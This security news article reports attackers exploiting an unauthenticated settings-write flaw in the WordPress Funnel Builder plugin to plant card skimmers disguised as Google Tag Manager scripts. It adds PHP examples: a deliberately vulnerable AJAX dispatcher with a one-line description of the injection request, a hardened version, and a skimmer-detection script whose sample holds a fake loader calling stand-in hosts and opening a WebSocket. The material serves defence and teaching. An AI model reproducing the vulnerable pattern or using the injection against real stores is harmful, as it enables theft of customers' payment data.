
Attackers exploit Funnel Builder bug to inject e-skimmers into e-stores


Attackers are exploiting a critical flaw in the WordPress Funnel Builder plugin to inject skimming code into WooCommerce checkout pages.

A critical vulnerability in the WordPress Funnel Builder plugin is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages, according to Sansec researchers.

Funnel Builder by FunnelKit is a checkout and upsell plugin installed on over 40,000 WooCommerce stores.

Attackers injected e-skimmer code designed to steal customers’ card and payment details during purchases. Website owners using the plugin are urged to apply the security update immediately and review their checkout pages for signs of compromise.

“Attackers are planting fake Google Tag Manager scripts into the plugin’s “External Scripts” setting. The injected code looks like ordinary analytics next to the store’s real tags, but loads a payment skimmer that steals credit card numbers, CVVs and billing addresses from checkout.” reads the report published by Sansec.

The researchers state that a critical flaw in the WordPress Funnel Builder plugin lets unauthenticated attackers inject malicious scripts into WooCommerce checkout pages. The vulnerable endpoint fails to verify permissions and allows attackers to modify global plugin settings, including the “External Scripts” option. By planting a malicious <script> tag, attackers can skim payment data from every checkout transaction.

“An unauthenticated request can therefore reach the internal method that writes attacker-controlled data straight into the plugin’s global settings.” continues the report. “Whatever sits in the “External Scripts” setting then gets printed onto every Funnel Builder checkout page, so an attacker can plant a <script> tag that runs on every checkout transaction across the site.”

The patch adds a proper permission check on the endpoint and restricts it to an allowlist of approved methods, so an unauthenticated request can no longer reach the settings writer.
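The following is an added example, not FunnelKit's code and not the patched plugin. It models the bug class the report describes: a WordPress AJAX dispatcher that calls an internal method by name and writes request data into a global option, shown next to a hardened form with the two fixes the patch is said to add (a permission check and a method allowlist). The hook names, class, method names and option key (`wffn_*`) are assumptions chosen for illustration.

```php
<?php
// Added example (not FunnelKit's code): a minimal model of the bug class the
// report describes, a WordPress AJAX dispatcher that calls an internal method
// by name and writes request data into a global option, beside the hardened
// form. The hook names, class, methods and option key (wffn_*) are assumptions.

class WFFN_Settings {
    const OPTION = 'wffn_global_settings';   // assumed option key

    public static function get_global_settings() {
        return get_option(self::OPTION, array());
    }

    // Merges caller-supplied keys into the global settings. The 'external_scripts'
    // key is later echoed unescaped into every checkout page, by design, so the
    // only thing between an attacker and a site-wide skimmer is who is allowed
    // to reach this method.
    public static function save_global_settings(array $data) {
        $settings = self::get_global_settings();
        update_option(self::OPTION, array_merge($settings, $data));
        return self::get_global_settings();
    }
}

// --- Vulnerable dispatcher ------------------------------------------------
// Registered for unauthenticated callers (wp_ajax_nopriv_) and dispatching on a
// request-controlled method name with no capability check, nonce or allowlist.
// An anonymous POST with method=save_global_settings and
// data[external_scripts]=<script src=...></script> plants the loader.
add_action('wp_ajax_nopriv_wffn_settings', 'wffn_dispatch_vulnerable');
add_action('wp_ajax_wffn_settings', 'wffn_dispatch_vulnerable');

function wffn_dispatch_vulnerable() {
    $method = isset($_POST['method']) ? (string) $_POST['method'] : '';
    $data   = isset($_POST['data']) && is_array($_POST['data']) ? $_POST['data'] : array();
    if (method_exists('WFFN_Settings', $method)) {
        $result = call_user_func(array('WFFN_Settings', $method), $data);
        wp_send_json_success($result);
    }
    wp_send_json_error('unknown method', 400);
}

// --- Hardened dispatcher --------------------------------------------------
// Logged-in hook only (no nopriv registration), a nonce bound to this action,
// an explicit capability check, and an allowlist of methods the endpoint may
// call. Storing raw <script> markup stays an administrator feature, which is
// why the authorization check, not output escaping, is the fix here.
add_action('wp_ajax_wffn_settings_v2', 'wffn_dispatch_hardened');

function wffn_dispatch_hardened() {
    check_ajax_referer('wffn_settings_nonce', 'nonce');        // dies on a bad nonce
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);
    }
    $allowed = array('get_global_settings', 'save_global_settings');
    $method  = isset($_POST['method']) ? sanitize_key($_POST['method']) : '';
    if (!in_array($method, $allowed, true)) {
        wp_send_json_error('unknown method', 400);
    }
    $data = isset($_POST['data']) && is_array($_POST['data']) ? wp_unslash($_POST['data']) : array();
    wp_send_json_success(call_user_func(array('WFFN_Settings', $method), $data));
}
```

The vulnerable version fails in three independent ways: it is reachable without a session, it performs no capability check, and `method_exists()` lets the request pick any public method on the class. The hardened version closes all three; the allowlist matters even once a capability check exists, because it keeps future helper methods from becoming reachable by accident.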

Sansec observed attackers abusing the Funnel Builder flaw to inject malware disguised as a Google Tag Manager or Analytics script. The fake loader silently downloads a second-stage script from an attacker-controlled domain and opens a WebSocket connection to a remote C2 server (“wss://protect-wss[.]com/ws”). Then, a custom payment skimmer is delivered to steal credit card numbers, CVVs, billing addresses, and other customer data during checkout.

Attackers mimic trusted tracking tags to avoid detection.

FunnelKit urged customers to immediately update Funnel Builder to version 3.15.0.3 after discovering a flaw that allowed attackers to inject malicious scripts into checkout pages. Users are also advised to review the plugin’s External Scripts settings and remove any unknown code. Security experts further recommend scanning affected stores to detect skimmers, malware, backdoors, or other signs of compromise.
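A triage helper for the review step above, as an added example that is neither Sansec's nor FunnelKit's code. Fed the raw value of the External Scripts setting (or a saved copy of a rendered checkout page), it lists every script tag and flags the ones that do not belong: external scripts from hosts outside an allowlist, inline loaders that reference a non-allowlisted host while looking like a Google Tag Manager bootstrap, and inline code that opens a WebSocket, which is the C2 channel the report describes. The allowlist, the sample input and the `.example` hosts in it are constructed; the real C2 host from the report is protect-wss[.]com.

```php
<?php
// Added example (not Sansec's or FunnelKit's code): audit the script tags in
// the External Scripts setting or a checkout page. The allowlist and the
// sample HTML below are constructed for illustration.

function wffn_allowed_script_hosts() {
    // Hosts the store owner knowingly uses; anything else is a finding.
    return array('www.googletagmanager.com', 'www.google-analytics.com');
}

// Returns a list of findings, each ['reason' => ..., 'snippet' => ...].
function wffn_audit_scripts($html) {
    $findings = array();
    $allowed  = wffn_allowed_script_hosts();
    $dom = new DOMDocument();
    libxml_use_internal_errors(true);          // the setting is a fragment, not a document
    $dom->loadHTML('<div>' . $html . '</div>');
    libxml_clear_errors();

    foreach ($dom->getElementsByTagName('script') as $script) {
        $src     = $script->getAttribute('src');
        $body    = trim($script->textContent);
        $snippet = $src !== '' ? $src : substr($body, 0, 80);

        if ($src !== '') {
            // External script: judge it by the host it loads from.
            $host = parse_url($src, PHP_URL_HOST);
            if (!is_string($host) || !in_array(strtolower($host), $allowed, true)) {
                $findings[] = array('reason' => 'external script from non-allowlisted host', 'snippet' => $snippet);
            }
            continue;
        }

        // Inline script: a GTM-style bootstrap is expected, but check where it
        // really loads from. The fake loaders mimic the snippet, not the host.
        if (preg_match_all('#https?://([^/\'"\s]+)#i', $body, $m)) {
            foreach (array_unique($m[1]) as $host) {
                if (!in_array(strtolower($host), $allowed, true)) {
                    $findings[] = array('reason' => "inline loader references $host", 'snippet' => $snippet);
                }
            }
        }
        // A tracking tag has no business opening a WebSocket from checkout.
        if (preg_match('#wss?://|\bWebSocket\b#i', $body)) {
            $findings[] = array('reason' => 'inline script opens a WebSocket', 'snippet' => $snippet);
        }
    }
    return $findings;
}

// Constructed sample: one real-looking GTM bootstrap, one look-alike loader
// that fetches from another host and opens a WebSocket, one unknown external.
$sample = <<<'HTML'
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXXXXX');</script>
<script>(function(){var s=document.createElement('script');s.async=true;
s.src='https://gtm-cdn.example/gtm.js?id=GTM-XXXXXXX';document.head.appendChild(s);
var ws=new WebSocket('wss://c2.example/ws');})();</script>
<script src="https://cdn.example/analytics.min.js"></script>
HTML;

foreach (wffn_audit_scripts($sample) as $f) {
    echo $f['reason'], ': ', $f['snippet'], PHP_EOL;
}
```

Run against the sample, the first (legitimate) tag produces nothing, the look-alike loader is reported twice (foreign host, WebSocket) and the unknown external script once. The host-based check is deliberate: the injected code "looks like ordinary analytics", so matching on what the snippet resembles is exactly the check the attacker designed it to pass.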

Sansec also provided indicators of compromise (IoCs).


Pierluigi Paganini

(SecurityAffairs – hacking, WordPress)